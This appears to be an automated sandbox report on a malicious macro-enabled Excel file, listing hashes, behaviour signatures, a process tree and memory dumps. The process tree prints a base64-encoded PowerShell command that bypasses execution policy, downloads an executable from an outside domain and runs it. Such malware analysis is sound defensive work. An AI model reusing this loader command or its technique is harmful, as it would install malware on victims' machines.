20f8bd13bdcb85b3586ed8373a98722550aae1b898157779d16d7f19833b0d6a

General

Target

3823aa0c8a9a48d236cce65b53bc9c6b.xlsm
Size

47KB
MD5

3823aa0c8a9a48d236cce65b53bc9c6b
SHA1

01b0eaa8bdcb1b3b93468c04919bf2fd16bceccc
SHA256

20f8bd13bdcb85b3586ed8373a98722550aae1b898157779d16d7f19833b0d6a
SHA512

79cd6cf9347379644ce5b379bc88f8c12e43ec8656c961176dd89c18a11fa3f0f50d12bc23cdc478f2cc51171047966e32ad768f40c3579a7b68c1001d706835
SSDEEP

768:hKphj2IvOGNWqfISGBnXKIg2TPacxD5SGj2y+bgPnrHS4JwM5iQ/6er8LqrXoMEY:4WaOVAIrBnkWycxlr2gPnW4Jt54er1V

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3404	4816	cmd.exe	15

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4400	EXCEL.EXE

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4400	EXCEL.EXE
4400	EXCEL.EXE

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\3823aa0c8a9a48d236cce65b53bc9c6b.xlsm"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy BypasS -ENC JAByAGUAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAIgBoAHQAdABwAHMAOgAvAC8AcwBvAGYAdABlAHIAcwB5AHUALgBjAG8AbQAvAGEAcABpAC8AdgAzAC8AZABlAHQAZQByAG0AaQBuAGEAbgB0AHMALwBiAGUAdAB1AGwAaQBuAGkAYwAvAG0AdQBkAG0AaQBuAG4AbwB3AHMAIgApAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAkAG0AZQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKACQAcgBlAHEALgBDAG8AcAB5AFQAbwAoACQAbQBlAG0AKQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBvAGYAdABlAHIAcwB5AHUAIABNAGEAbgBhAGcAZQByAC4AZQB4AGUAIgAgAC0AVgBhAGwAdQBlACAAJABtAGUAbQAuAFQAbwBBAHIAcgBhAHkAKAApACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlAAoAJAByAGUAcQAuAEMAbABvAHMAZQAoACkACgAkAG0AZQBtAC4AQwBsAG8AcwBlACgAKQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBvAGYAdABlAHIAcwB5AHUAIABNAGEAbgBhAGcAZQByAC4AZQB4AGUAIgA=
1⤵
PID:2056

C:\Windows\system32\cmd.exe
cmd.exe /c "powershell -ExecutionPolicy BypasS -ENC JAByAGUAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAIgBoAHQAdABwAHMAOgAvAC8AcwBvAGYAdABlAHIAcwB5AHUALgBjAG8AbQAvAGEAcABpAC8AdgAzAC8AZABlAHQAZQByAG0AaQBuAGEAbgB0AHMALwBiAGUAdAB1AGwAaQBuAGkAYwAvAG0AdQBkAG0AaQBuAG4AbwB3AHMAIgApAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAkAG0AZQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKACQAcgBlAHEALgBDAG8AcAB5AFQAbwAoACQAbQBlAG0AKQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBvAGYAdABlAHIAcwB5AHUAIABNAGEAbgBhAGcAZQByAC4AZQB4AGUAIgAgAC0AVgBhAGwAdQBlACAAJABtAGUAbQAuAFQAbwBBAHIAcgBhAHkAKAApACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlAAoAJAByAGUAcQAuAEMAbABvAHMAZQAoACkACgAkAG0AZQBtAC4AQwBsAG8AcwBlACgAKQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBvAGYAdABlAHIAcwB5AHUAIABNAGEAbgBhAGcAZQByAC4AZQB4AGUAIgA="
1⤵
- Process spawned unexpected child process
PID:3404

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i5ijptqv.1ik.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2056-3767-0x0000022DFBB80000-0x0000022DFBBA2000-memory.dmp

Filesize
136KB

Download
memory/2056-3780-0x00007FF9BF580000-0x00007FF9C0041000-memory.dmp

Filesize
10.8MB

Download
memory/2056-3775-0x00007FF9BF580000-0x00007FF9C0041000-memory.dmp

Filesize
10.8MB

Download
memory/2056-3776-0x0000022DFBB00000-0x0000022DFBB10000-memory.dmp

Filesize
64KB

Download
memory/2056-3777-0x0000022DFBB00000-0x0000022DFBB10000-memory.dmp

Filesize
64KB

Download
memory/4400-20-0x00007FF9EA1B0000-0x00007FF9EA3A5000-memory.dmp

Filesize
2.0MB

Download
memory/4400-2-0x00007FF9AA230000-0x00007FF9AA240000-memory.dmp

Filesize
64KB

Download
memory/4400-21-0x00007FF9EA1B0000-0x00007FF9EA3A5000-memory.dmp

Filesize
2.0MB

Download
memory/4400-5-0x00007FF9EA1B0000-0x00007FF9EA3A5000-memory.dmp

Filesize
2.0MB

Download
memory/4400-17-0x00007FF9EA1B0000-0x00007FF9EA3A5000-memory.dmp

Filesize
2.0MB

Download
memory/4400-16-0x00007FF9EA1B0000-0x00007FF9EA3A5000-memory.dmp

Filesize
2.0MB

Download
memory/4400-15-0x00007FF9EA1B0000-0x00007FF9EA3A5000-memory.dmp

Filesize
2.0MB

Download
memory/4400-13-0x00007FF9EA1B0000-0x00007FF9EA3A5000-memory.dmp

Filesize
2.0MB

Download
memory/4400-12-0x00007FF9EA1B0000-0x00007FF9EA3A5000-memory.dmp

Filesize
2.0MB

Download
memory/4400-10-0x00007FF9EA1B0000-0x00007FF9EA3A5000-memory.dmp

Filesize
2.0MB

Download
memory/4400-9-0x00007FF9EA1B0000-0x00007FF9EA3A5000-memory.dmp

Filesize
2.0MB

Download
memory/4400-7-0x00007FF9EA1B0000-0x00007FF9EA3A5000-memory.dmp

Filesize
2.0MB

Download
memory/4400-6-0x00007FF9EA1B0000-0x00007FF9EA3A5000-memory.dmp

Filesize
2.0MB

Download
memory/4400-4-0x00007FF9AA230000-0x00007FF9AA240000-memory.dmp

Filesize
64KB

Download
memory/4400-3-0x00007FF9AA230000-0x00007FF9AA240000-memory.dmp

Filesize
64KB

Download
memory/4400-22-0x00007FF9EA1B0000-0x00007FF9EA3A5000-memory.dmp

Filesize
2.0MB

Download
memory/4400-1-0x00007FF9AA230000-0x00007FF9AA240000-memory.dmp

Filesize
64KB

Download
memory/4400-0-0x00007FF9AA230000-0x00007FF9AA240000-memory.dmp

Filesize
64KB

Download
memory/4400-23-0x00007FF9EA1B0000-0x00007FF9EA3A5000-memory.dmp

Filesize
2.0MB

Download
memory/4400-19-0x00007FF9EA1B0000-0x00007FF9EA3A5000-memory.dmp

Filesize
2.0MB

Download
memory/4400-18-0x00007FF9EA1B0000-0x00007FF9EA3A5000-memory.dmp

Filesize
2.0MB

Download
memory/4400-14-0x00007FF9A7F80000-0x00007FF9A7F90000-memory.dmp

Filesize
64KB

Download
memory/4400-11-0x00007FF9EA1B0000-0x00007FF9EA3A5000-memory.dmp

Filesize
2.0MB

Download
memory/4400-8-0x00007FF9A7F80000-0x00007FF9A7F90000-memory.dmp

Filesize
64KB

Download
memory/4400-3786-0x00007FF9EA1B0000-0x00007FF9EA3A5000-memory.dmp

Filesize
2.0MB

Download
memory/4400-3806-0x00007FF9EA1B0000-0x00007FF9EA3A5000-memory.dmp

Filesize
2.0MB

Download
memory/4400-3805-0x00007FF9AA230000-0x00007FF9AA240000-memory.dmp

Filesize
64KB

Download
memory/4400-3804-0x00007FF9AA230000-0x00007FF9AA240000-memory.dmp

Filesize
64KB

Download
memory/4400-3803-0x00007FF9AA230000-0x00007FF9AA240000-memory.dmp

Filesize
64KB

Download
memory/4400-3802-0x00007FF9AA230000-0x00007FF9AA240000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing